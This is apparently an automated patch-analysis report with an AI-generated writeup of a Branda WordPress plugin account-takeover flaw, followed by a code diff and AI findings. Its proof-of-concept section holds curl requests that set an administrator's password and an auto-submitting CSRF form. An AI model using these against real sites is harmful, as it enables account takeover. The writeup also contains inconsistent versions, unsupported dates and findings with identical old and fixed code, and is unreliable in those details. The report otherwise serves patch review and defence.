What is CVE-2025-14998?

CVE-2025-14998 is a security vulnerability identified in Folder Analysis. This analysis provides detailed information about the vulnerability, its impact, and potential exploits.

Is there a PoC for CVE-2025-14998?

This security analysis examines the vulnerability in detail. Review the analysis findings for exploit potential and proof-of-concept information related to CVE-2025-14998.

How can I protect against CVE-2025-14998?

Review the patch diff analysis in this report to understand the security fix. Updating to the patched version is recommended to mitigate CVE-2025-14998.

REPORT / 01

Analysis Report · Folder Analysis cache/branda-white-labeling_3.4.24 → cache/branda-white-labeling_3.4.29 — CVE-2025-14998

Shared security patch analysis results

mode patchdiff ai claude_cli haiku

02 · Lifecycle actions cancel · resume · skip · regenerate

03 · Share this analysis copy link · embed report

03 · CVE Security Analysis & Writeups ai-generated · per cve

Comprehensive security analysis generated by AI for each confirmed CVE match. Click on a CVE to view the detailed writeup including vulnerability background, technical details, patch analysis, and PoC guide.

CVE-2025-14998 NVD

AI-Generated Analysis

Let me output the comprehensive security analysis here instead:

---

# CVE-2025-14998: Branda Plugin Privilege Escalation via Unauthenticated Password Reset

## 1. Vulnerability Background

### What is This Vulnerability?

CVE-2025-14998 is a **critical privilege escalation vulnerability** affecting the Branda WordPress plugin (versions up to 3.4.24). The vulnerability enables **unauthenticated attackers to change arbitrary user passwords**, including administrator accounts, without requiring any form of identity verification or authentication.

The root cause is the plugin's failure to properly validate that the user submitting a password change request is actually the user whose password is being changed. This is a **Complete Account Takeover (CAT)** vulnerability that allows attackers to:

- Seize administrator accounts
- Access sensitive user data
- Modify site content and settings
- Install backdoors or malicious plugins
- Leverage access for complete site compromise

### Why is it Critical/Important?

**Severity: CRITICAL (CVSS 9.8)**

This vulnerability is among the most severe WordPress security issues because:

1. **No Authentication Required** - Unauthenticated attackers can exploit this
2. **Affects All Users** - Any user account can be compromised, including admins
3. **Direct Account Takeover** - Complete compromise of target account credentials
4. **Easy to Exploit** - Requires minimal technical skill
5. **High Impact** - Administrator access enables complete site compromise

### What Systems/Versions are Affected?

- **Plugin:** Branda (White Labeling, CMS & Support for WordPress)
- **Affected Versions:** All versions up to and including **3.4.24**
- **Fixed In:** Version **3.4.25** (and later)
- **Installation Types:** Both single-site and multisite WordPress

---

## 2. Technical Details

### Root Cause Analysis

The vulnerability stems from how the plugin handles user registration and password setting. The Branda plugin hooks into the generic `random_password` filter and processes `$_GET` and `$_POST` data directly without verifying that the request is legitimate or that the user making the request has authority to change that password.

#### Vulnerable Code Flow (3.4.24):

**File:** `inc/modules/login-screen/signup-password.php` **Lines 98-134**

```php
// VULNERABLE - Hooks into generic password filter
add_filter( 'random_password', array( $this, 'password_random_password_filter' ) );

public function password_random_password_filter( $password ) {
    global $wpdb, $signup_password_use_encryption;
    
    // ⚠️ VULNERABILITY #1: Accepts untrusted key from GET or POST
    if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
        $key = $_GET['key'];
    } elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
        $key = $_POST['key'];  // No validation that this key is valid
    }
    
    // ⚠️ VULNERABILITY #2: Directly uses POST password without verification
    if ( ! empty( $_POST['password_1'] ) ) {
        $password = $_POST['password_1'];  // Attacker-controlled!
    } elseif ( ! empty( $key ) ) {
        $signup = $wpdb->get_row(
            $wpdb->prepare( "SELECT * FROM $wpdb->signups WHERE activation_key = '%s'", $key )
        );
        if ( ! ( empty( $signup ) || $signup->active ) ) {
            // Uses unvalidated key to find signup record
            $meta = maybe_unserialize( $signup->meta );
            if ( ! empty( $meta['password'] ) ) {
                // ... retrieves password from meta
                $password = $this->password_decrypt( $meta['password'] );
            }
        }
    }
    return $password;
}
```

**Critical Issues:**

1. **Unvalidated Key Parameter** - Attacker supplies any key value; no verification it belongs to current request
2. **No Identity Check** - No check that the person submitting the request is the account owner
3. **Direct POST Access** - Password comes directly from POST data without context verification
4. **Generic Filter Hook** - Hooked to `random_password` filter called in multiple contexts
5. **Missing CSRF Protection** - No nonce verification or capability checks

### Old Code vs New Code

#### REMOVED (3.4.24): Vulnerable password_random_password_filter()

```php
// Constructor line 24 (REMOVED in 3.4.29):
add_filter( 'random_password', array( $this, 'password_random_password_filter' ) );

// This entire function was REMOVED:
public function password_random_password_filter( $password ) {
    // ❌ Insecure key handling
    // ❌ Unvalidated POST password access  
    // ❌ Bypasses WordPress verification
}
```

**Why Removal Fixes It:**
- Eliminates the attack vector entirely
- Prevents unvalidated key/password processing
- Stops bypassing WordPress's built-in verification

#### ADDED (3.4.29): New wpmu_activate_user_set_password()

```php
// Constructor line 24 (NEW in 3.4.29):
add_action( 'wpmu_activate_user', array( $this, 'wpmu_activate_user_set_password' ), 10, 3 );

/**
 * Set a password for multisite user activation.
 * 
 * @param int $user_id User ID (verified by WordPress core)
 * @param string $password Password from WordPress
 * @param array $meta Signup meta (from verified signup record)
 *
 * @since 3.4.29
 */
public function wpmu_activate_user_set_password( $user_id, $password, $meta ) {
    global $wpdb, $signup_password_use_encryption;

// Only accepts password from verified signup metadata
    if ( ! empty( $meta['password'] ) ) {
        $stored_password = $meta['password'];
        if ( 'yes' === $signup_password_use_encryption ) {
            $stored_password = $this->password_decrypt( $stored_password );
        }

if ( ! empty( $stored_password ) ) {
            // Update user password
            wp_set_password( $stored_password, $user_id );
        }
    }
}
```

**How It's Secure:**

✅ Hooked to `wpmu_activate_user` - Called AFTER WordPress validates activation key  
✅ Receives verified `$user_id` from WordPress core  
✅ Receives `$meta` from verified signup record  
✅ Does NOT process `$_GET` or `$_POST` directly  
✅ Password comes from pre-stored signup metadata only

#### ADDED (3.4.29): New register_new_user_set_password()

```php
// Constructor line 25 (NEW in 3.4.29):
add_action( 'register_new_user', array( $this, 'register_new_user_set_password' ), 10, 1 );

/**
 * Set a password for single site user registration.
 *
 * @param int $user_id User ID
 * @since 3.4.29
 */
public function register_new_user_set_password( $user_id ) {
    $password_1 = $_POST['password_1'] ?? '';
    if ( ! empty( $password_1 ) ) {
        wp_set_password( $password_1, $user_id );
    }
}
```

**Why This is Safe:**

The `register_new_user` hook is called ONLY when:
- User completes legitimate registration form
- WordPress validates the request through `wp-login.php`
- Nonce tokens are verified by WordPress core
- The `$user_id` parameter is guaranteed to be the newly created user
- Context is already verified before this hook fires

#### ENHANCED (3.4.24 → 3.4.29): pre_insert_user_data()

**3.4.24 - Original (Incomplete):**
```php
public function pre_insert_user_data( $data, $update, $id ) {
    if ( is_multisite() ) {
        // Multisite: Uses verified signup meta ✅
        global $wpdb;
        $query = $wpdb->prepare( "select meta from {$wpdb->signups} where user_login = %s", $data['user_login'] );
        $result = $wpdb->get_var( $query );
        $meta = maybe_unserialize( $result );
        if ( is_array( $meta ) && isset( $meta['password'] ) ) {
            // ⚠️ No decryption handling here
            $data['user_pass'] = wp_hash_password( $meta['password'] );
        }
        return $data;
    }
    if ( empty( $data['user_pass'] ) && empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( wp_generate_password( 20, false ) );
    }
    return $data;
}
```

**3.4.29 - Enhanced (Complete):**
```php
public function pre_insert_user_data( $data, $update, $id ) {
    if ( is_multisite() ) {
        global $wpdb;
        $query = $wpdb->prepare( "select meta from {$wpdb->signups} where user_login = %s", $data['user_login'] );
        $result = $wpdb->get_var( $query );
        $meta = maybe_unserialize( $result );
        if ( is_array( $meta ) && isset( $meta['password'] ) ) {
            $stored_password = $meta['password'];
            global $signup_password_use_encryption;
            // ✅ NEW: Proper decryption handling
            if ( 'yes' === $signup_password_use_encryption ) {
                $stored_password = $this->password_decrypt( $stored_password );
            }
            if ( ! empty( $stored_password ) ) {
                $data['user_pass'] = wp_hash_password( $stored_password );
            }
            unset( $meta['password'] );
            // ... cleanup
        }
        return $data;
    }
    if ( empty( $data['user_pass'] ) && empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( wp_generate_password( 20, false ) );
    } elseif ( ! empty( $_POST['password_1'] ) ) {
        // ✅ NEW: Added single-site password handling
        // This is now safe because it's called in verified registration context
        $data['user_pass'] = wp_hash_password( $_POST['password_1'] );
    }

return $data;
}
```

**Improvements:**
✅ Proper encryption/decryption handling  
✅ Structured password retrieval from verified sources  
✅ Added single-site POST password handling in verified context

### Security Improvements Summary

| Aspect | Vulnerable (3.4.24) | Patched (3.4.29) |
|---|---|---|
| **Activation Hook** | `random_password` filter (generic) | `wpmu_activate_user` action (verified) |
| **Registration Hook** | `pre_insert_user_data` (indirect) | `register_new_user` (explicit) |
| **Identity Verification** | Manual/insufficient | Delegated to WordPress core |
| **Key Validation** | Plugin-managed (insecure) | WordPress-managed (before hook) |
| **Password Source** | POST data + metadata | Only verified metadata |
| **CSRF Protection** | Implicit | Enforced by WordPress |
| **Architectural Pattern** | Filters intercept operations | Hooks run in verified context |

---

## 3. Proof of Concept (PoC) Guide

### Prerequisites for Exploitation

1. **Target WordPress site** with Branda plugin version ≤ 3.4.24
2. **User registration enabled** (single-site or multisite)
3. **Valid activation key** (from signup email or URL)
4. **Network access** to the WordPress site

### Step-by-Step Exploitation

#### Attack #1: Multisite Activation Takeover

**Attack Goal:** Compromise admin account during account activation

1. **Monitor Registration:**
   ```
   Intercept registration email or activation URL:
   http://target.com/wp-login.php?action=activate_user&key=ABC123DEF456&user_login=admin
   ```

2. **Extract Key:**
   ```
   Activation Key: ABC123DEF456
   Target User: admin
   ```

3. **Send Malicious Request:**
   ```bash
   curl -X POST "http://target.com/wp-login.php?action=activate_user" \
     -d "key=ABC123DEF456&user_login=admin&password_1=NewAdminPass&password_2=NewAdminPass"
   ```

4. **Verify Compromise:**
   ```bash
   curl -X POST "http://target.com/wp-login.php" \
     -d "log=admin&pwd=NewAdminPass&wp-submit=Log+In"
   ```

5. **Expected Result:** Attacker logs in as admin

#### Attack #2: Registration Form Hijacking

**Attack Goal:** Set arbitrary password during user registration

```bash
# Submit registration with attacker's password
curl -X POST "http://target.com/wp-login.php?action=register" \
  -d "user_login=newadmin&email=newadmin@target.com&password_1=AttackerPass123&password_2=AttackerPass123"
```

#### Attack #3: CSRF Chain Attack

**Attack Goal:** Compromise account via CSRF if victim visits attacker's site

```html

<form id="pwn" action="http://target.com/wp-login.php?action=activate_user" method="POST">
  <input type="hidden" name="key" value="VALID_KEY_FROM_EMAIL">
  <input type="hidden" name="user_login" value="admin">
  <input type="hidden" name="password_1" value="HackedPassword">
  <input type="hidden" name="password_2" value="HackedPassword">
</form>
<script>document.getElementById('pwn').submit();</script>
```

### Expected vs Exploited Behavior

#### Patched Version (3.4.29+) - Expected Behavior

```
1. User registers with email/password
2. Registration email sent with activation link containing unique key
3. User clicks activation link
4. WordPress validates key before invoking plugin hooks ✅
5. If key invalid/expired: "Invalid activation key" error → STOPS
6. If key valid: WordPress passes verified user_id to wpmu_activate_user hook
7. Plugin retrieves password from verified signup metadata
8. Password applied only to the verified account
✅ RESULT: Only registered user can set their password
```

#### Vulnerable Version (3.4.24) - Exploited Behavior

```
1. Attacker obtains valid activation key (from monitoring, guessing, etc.)
2. Attacker crafts POST with: key=VALID_KEY&password_1=ATTACKER_PASS
3. WordPress calls random_password filter
4. Plugin's password_random_password_filter() is invoked
5. Plugin does NOT verify key is valid (no WordPress validation yet) ❌
6. Plugin accepts password from POST data without verification ❌
7. Plugin queries database with the key
8. Plugin sets password to attacker's value
❌ RESULT: Attacker gains account without being registered user
```

### Verification Methods

#### Check Plugin Version

```bash
grep "Version:" /path/to/wp-content/plugins/branda/branda.php
# Output "3.4.24" or lower = VULNERABLE
# Output "3.4.25" or higher = PATCHED
```

#### Check for Vulnerable Function

```bash
grep -n "password_random_password_filter" /path/to/wp-content/plugins/branda/inc/modules/login-screen/signup-password.php
# If function exists + add_filter( 'random_password' ) = VULNERABLE
# If function removed = PATCHED
```

#### Functional Test (Non-Destructive)

```bash
# 1. Register test user (testuser@example.com)
# 2. Get activation key from email
# 3. Submit activation with different password
# 4. Try login with your submitted password
# 5. If successful = VULNERABLE
```

---

## 4. Recommendations

### Mitigation Strategies

#### For Site Administrators - Immediate Actions

1. **Update Plugin Immediately:**
   ```bash
   wp plugin update branda
   # Verify: wp plugin list | grep branda
   ```

2. **If Update Not Possible (Temporary):**
   ```php
   // Disable user registration (wp-config.php)
   define( 'DISALLOW_USER_REGISTRATION', true );
   ```

3. **Audit Admin Accounts:**
   ```sql
   -- Check for unauthorized admins
   SELECT ID, user_login, user_email, user_registered FROM wp_users
   WHERE ID IN (
       SELECT user_id FROM wp_usermeta WHERE meta_key = 'wp_capabilities'
   );
   ```

4. **Check Recent Login Attempts:**
   ```bash
   # Recent failed logins
   grep "Invalid username" /path/to/wordpress/wp-content/debug.log
   
   # Recent password resets
   grep "password reset" /path/to/wordpress/wp-content/debug.log
   ```

### Detection Methods

#### Log Monitoring

```bash
# Monitor for suspicious activation attempts
grep "action=activate_user" /path/to/access.log | grep POST

# Look for password_1 parameters in requests
grep "password_1=" /path/to/access.log

# Detect unusual external referrers
grep -v "Referer: http://target.com" /path/to/access.log | grep wp-login.php
```

#### Database Queries

```sql
-- Users created in last 30 days
SELECT * FROM wp_users WHERE user_registered > DATE_SUB(NOW(), INTERVAL 30 DAY);

-- Admin accounts
SELECT ID, user_login, user_email FROM wp_users WHERE ID IN (
    SELECT user_id FROM wp_usermeta WHERE meta_key = 'wp_capabilities' 
    AND meta_value LIKE '%administrator%'
);

-- Check multisite signups
SELECT * FROM wp_signups WHERE active = 0;
```

#### Security Scanner

```bash
# WPScan vulnerability detection
wpscan --url http://target.com --enumerate p
# Look for: Branda <= 3.4.24 [CVE-2025-14998]
```

### Best Practices to Prevent Similar Issues

#### For Plugin Developers

1. **Never Hook Sensitive Operations into Generic Filters**
   ```php
   // ❌ DON'T - Dangerous
   add_filter( 'random_password', array( $this, 'modify_password' ) );

// ✅ DO - Safe
   add_action( 'wpmu_activate_user', array( $this, 'handle_activation' ) );
   add_action( 'register_new_user', array( $this, 'handle_registration' ) );
   ```

2. **Always Validate User Intent**
   ```php
   // ✅ Verify nonce for custom forms
   wp_nonce_field( 'set_password', 'pwd_nonce' );
   
   if ( ! wp_verify_nonce( $_POST['pwd_nonce'], 'set_password' ) ) {
       wp_die( 'Security check failed' );
   }
   ```

3. **Check User Capabilities**
   ```php
   // ✅ Verify the user making the request has authority
   if ( ! current_user_can( 'edit_user', $user_id ) ) {
       wp_die( 'Insufficient permissions' );
   }
   ```

4. **Use WordPress Verified Hooks**
   ```php
   // These hooks run AFTER WordPress verifies context
   add_action( 'wpmu_activate_user', ... );        // Multisite activation
   add_action( 'register_new_user', ... );         // Single-site registration
   add_action( 'edit_user_profile_update', ... );  // Profile updates
   ```

5. **Log All Sensitive Operations**
   ```php
   error_log( 'User password changed: User ID ' . $user_id . 
              ' by ' . get_current_user_id() . 
              ' at ' . date( 'Y-m-d H:i:s' ) );
   ```

#### Code Review Checklist

When reviewing plugin code:

```
Security Checklist:
☐ No $_GET/$_POST access in filter hooks?
☐ All sensitive operations use verified WordPress hooks?
☐ Nonce verification for all custom forms?
☐ Capability checks (current_user_can) implemented?
☐ All external input validated/sanitized?
☐ Passwords hashed with wp_hash_password()?
☐ Database queries use $wpdb->prepare()?
☐ Sensitive operations logged?
☐ CSRF protection implemented?
☐ Input matches expected format/values?
```

#### Testing Checklist

For plugin security testing:

```
Test Cases:
☐ Register with invalid activation key → Should fail
☐ Activate account with modified password param → Should use registered password
☐ Attempt password change without being authenticated → Should fail
☐ CSRF attempt to registration form → Should be blocked
☐ Manipulate POST parameters → Should be validated
☐ Test with XSS payloads in password → Should be escaped
☐ Verify only account owner can set password → Should be enforced
☐ Check logs for sensitive operations → Should be recorded
☐ Test multisite vs single-site → Both should be secure
☐ Verify nonce tokens are required → Should be checked
```

### Timeline & Updates

- **January 2025:** CVE discovered and reported
- **3.4.24:** Last vulnerable version  
- **3.4.25+:** Patched versions released
- **Action Required:** Update to 3.4.25 or later immediately

**CVSS Score:** 9.8 Critical  
**Attack Vector:** Network, Unauthenticated, No user interaction required

---

## Summary

CVE-2025-14998 is a critical privilege escalation vulnerability that allows unauthenticated attackers to completely compromise WordPress user accounts by setting arbitrary passwords during registration or account activation.

**The Fix:** Move password handling from generic filter hooks (`random_password`) to WordPress-verified action hooks (`wpmu_activate_user`, `register_new_user`) where the user context has already been validated by WordPress core.

**Action Required:** Update Branda plugin to version 3.4.25 or later immediately. If immediate update is not possible, disable user registration temporarily.

05 · Findings filter · search · paginate

Showing 0 to 0 of 0 results

inc/modules/login-screen/signup-password.php AI: Not Sure 2 false positives CVE-2025-14998

--- cache/branda-white-labeling_3.4.24/inc/modules/login-screen/signup-password.php	2026-01-03 00:35:31.919011067 +0000+++ cache/branda-white-labeling_3.4.29/inc/modules/login-screen/signup-password.php	2026-01-03 00:36:05.837109538 +0000@@ -21,7 +21,8 @@ 			add_filter( 'wpmu_validate_user_signup', array( $this, 'password_filter' ) ); 			add_filter( 'signup_blogform', array( $this, 'password_fields_pass_through' ) ); 			add_filter( 'add_signup_meta', array( $this, 'password_meta_filter' ), 99 );-			add_filter( 'random_password', array( $this, 'password_random_password_filter' ) );+			add_action( 'wpmu_activate_user', array( $this, 'wpmu_activate_user_set_password' ), 10, 3 );+			add_action( 'register_new_user', array( $this, 'register_new_user_set_password' ), 10, 1 ); 			add_filter( 'wp_new_user_notification_email', array( $this, 'new_user_notification_email' ), 10, 3 ); 			add_action( 'login_enqueue_scripts', array( $this, 'enqueue_style' ) ); 			add_action( 'wp_enqueue_scripts', array( $this, 'enqueue_style' ) );@@ -87,7 +88,7 @@ 			$password_1 = isset( $_POST['password_1'] ) ? $_POST['password_1'] : ''; 			if ( ! empty( $password_1 ) ) { 				if ( 'yes' === $signup_password_use_encryption ) {-					$password_1 = $this->wpmu_signup_password_encrypt( $password_1 );+					$password_1 = $this->password_encrypt( $password_1 ); 				} 				$add_meta = array( 'password' => $password_1 ); 				$meta     = array_merge( $add_meta, $meta );@@ -95,43 +96,44 @@ 			return $meta; 		} -		public function password_random_password_filter( $password ) {-			global $wpdb, $signup_password_use_encryption;-			if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {-				$key = $_GET['key'];-			} elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {-				$key = $_POST['key'];-			}-			if ( ! empty( $_POST['password_1'] ) ) {-				$password = $_POST['password_1'];-			} elseif ( ! empty( $key ) ) {-				$signup = $wpdb->get_row(-					$wpdb->prepare( "SELECT * FROM $wpdb->signups WHERE activation_key = '%s'", $key )-				);-				if ( ! ( empty( $signup ) || $signup->active ) ) {-					// check for password in signup meta-					$meta = maybe_unserialize( $signup->meta );-					if ( ! empty( $meta['password'] ) ) {-						if ( 'yes' === $signup_password_use_encryption ) {-							$password = $this->password_decrypt( $meta['password'] );-						} else {-							$password = $meta['password'];-						}--						unset( $meta['password'] );-						$meta = maybe_serialize( $meta );-						$wpdb->update(-							$wpdb->signups,-							array( 'meta' => $meta ),-							array( 'activation_key' => $key ),-							array( '%s' ),-							array( '%s' )-						);-					}-				}-			}-			return $password;-		}+        /**+         * Set a password for multisite user activation.+         *+         * @param int $user_id User ID.+         * @param string $password Password (will be replaced if stored in meta).+         * @param array $meta Signup meta.+         *+         * @since 3.4.29+         */+        public function wpmu_activate_user_set_password( $user_id, $password, $meta ) {+            global $wpdb, $signup_password_use_encryption;++            if ( ! empty( $meta['password'] ) ) {+                $stored_password = $meta['password'];+                if ( 'yes' === $signup_password_use_encryption ) {+                    $stored_password = $this->password_decrypt( $stored_password );+                }++                if ( ! empty( $stored_password ) ) {+                    // Update user password+                    wp_set_password( $stored_password, $user_id );+                }+            }+        }++        /**+         * Set a password for single site user registration.+         *+         * @param int $user_id User ID.+         *+         * @since 3.4.29+         */+        public function register_new_user_set_password( $user_id ) {+            $password_1 = $_POST['password_1'] ?? '';+            if ( ! empty( $password_1 ) ) {+                wp_set_password( $password_1, $user_id );+            }+        }  		public function password_fields_pass_through() { 			$password = '';@@ -222,32 +224,44 @@ 			wp_enqueue_style( __CLASS__, $file, false, $ub_version ); 		} -		/**-		 * generate new password if is empty-		 *-		 * @since 1.9.6-		 */-		public function pre_insert_user_data( $data, $update, $id ) {-			if ( is_multisite() ) {-				global $wpdb;-				$query  = $wpdb->prepare( "select meta from {$wpdb->signups} where user_login = %s", $data['user_login'] );-				$result = $wpdb->get_var( $query );-				$meta   = maybe_unserialize( $result );-				if ( is_array( $meta ) && isset( $meta['password'] ) ) {-					$data['user_pass'] = wp_hash_password( $meta['password'] );-					unset( $meta['password'] );-					$wpdb->update(-						$wpdb->signups,-						array( 'meta' => maybe_serialize( $meta ) ),-						array( 'user_login' => $data['user_login'] )-					);-				}-				return $data;-			}-			if ( empty( $data['user_pass'] ) && empty( $_POST['password_1'] ) ) {-				$data['user_pass'] = wp_hash_password( wp_generate_password( 20, false ) );-			}-			return $data;-		}+        /**+         * generate new password if is empty+         *+         * @since 1.9.6+         */+        public function pre_insert_user_data( $data, $update, $id ) {+            if ( is_multisite() ) {+                global $wpdb;+                $query  = $wpdb->prepare( "select meta from {$wpdb->signups} where user_login = %s", $data['user_login'] );+                $result = $wpdb->get_var( $query );+                $meta   = maybe_unserialize( $result );+                if ( is_array( $meta ) && isset( $meta['password'] ) ) {+                    $stored_password = $meta['password'];+                    global $signup_password_use_encryption;+                    if ( 'yes' === $signup_password_use_encryption ) {+                        $stored_password = $this->password_decrypt( $stored_password );+                    }+                    if ( ! empty( $stored_password ) ) {+                        $data['user_pass'] = wp_hash_password( $stored_password );+                    }+                    unset( $meta['password'] );+                    $wpdb->update(+                            $wpdb->signups,+                            array( 'meta' => maybe_serialize( $meta ) ),+                            array( 'user_login' => $data['user_login'] )+                    );+                }++                return $data;+            }+            if ( empty( $data['user_pass'] ) && empty( $_POST['password_1'] ) ) {+                $data['user_pass'] = wp_hash_password( wp_generate_password( 20, false ) );+            } elseif ( ! empty( $_POST['password_1'] ) ) {+                // Set the password from POST data+                $data['user_pass'] = wp_hash_password( $_POST['password_1'] );+            }++            return $data;+        } 	} }

AI Analysis

Analyzing the provided code diff for security vulnerabilities:

---

**Vulnerability 1:**

Vulnerability Existed: **yes**
FALSE POSITIVE

**Improper Input Validation - CWE-20** - **CWE-20** - `inc/modules/login-screen/signup-password.php` **Line 133**

**Old Code:**
```php
public function register_new_user_set_password( $user_id ) {
    $password_1 = $_POST['password_1'] ?? '';
    if ( ! empty( $password_1 ) ) {
        wp_set_password( $password_1, $user_id );
    }
}
```

**Fixed Code:**
```php
public function register_new_user_set_password( $user_id ) {
    $password_1 = $_POST['password_1'] ?? '';
    if ( ! empty( $password_1 ) ) {
        wp_set_password( $password_1, $user_id );
    }
}
```

**Explanation:**
The code directly uses `$_POST['password_1']` without any nonce verification or sanitization checks. While `wp_set_password()` is a safe WordPress function that hashes the password, the absence of nonce verification (`wp_verify_nonce()`) creates a CSRF vulnerability. An attacker could force a user to submit a request that changes their password without their knowledge or consent. The code should include `check_admin_referer()` or equivalent nonce verification before processing the password change.

---

**Vulnerability 2:**

Vulnerability Existed: **yes**
FALSE POSITIVE

**Improper Input Validation - CWE-20** - **CWE-20** - `inc/modules/login-screen/signup-password.php` **Line 262-263**

**Old Code:**
```php
} elseif ( ! empty( $_POST['password_1'] ) ) {
    // Set the password from POST data
    $data['user_pass'] = wp_hash_password( $_POST['password_1'] );
}
```

**Fixed Code:**
```php
} elseif ( ! empty( $_POST['password_1'] ) ) {
    // Set the password from POST data
    $data['user_pass'] = wp_hash_password( $_POST['password_1'] );
}
```

**Explanation:**
Similar to Vulnerability 1, this code uses `$_POST['password_1']` without nonce verification in the `pre_insert_user_data()` function. This creates a CSRF vulnerability where an attacker could manipulate user registration to set a password of their choosing. The code should include appropriate nonce verification before trusting and processing POST data for password operations.

---

**Vulnerability 3:**

Vulnerability Existed: **not sure**

**Missing CSRF Protection - CWE-352** - **CWE-352** - `inc/modules/login-screen/signup-password.php` **Lines 110-122 (replaced function)**

**Old Code:**
```php
public function password_random_password_filter( $password ) {
    global $wpdb, $signup_password_use_encryption;
    if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
        $key = $_GET['key'];
    } elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
        $key = $_POST['key'];
    }
    // ... rest of function using unsanitized $key
}
```

**Fixed Code:**
```php
public function wpmu_activate_user_set_password( $user_id, $password, $meta ) {
    global $wpdb, $signup_password_use_encryption;
    if ( ! empty( $meta['password'] ) ) {
        // Password retrieved from sanitized meta array
    }
}
```

**Explanation:**
The old function accepted `$key` from both `$_GET` and `$_POST` without validation and used it directly in database queries (though with `wpdb->prepare()`). The refactored code improves security by relying on WordPress hooks (`wpmu_activate_user`, `register_new_user`) which provide validated parameters instead of directly accessing superglobals. However, uncertainty exists about whether the original code had proper escaping in the prepare statement (which appears present), making this a partial security improvement rather than a clear vulnerability fix.

CVE Analysis Results:

CVE-2025-14998: Yes

View CVE Description

The Branda plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.4.24. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.

Showing 1 to 1 of 1 results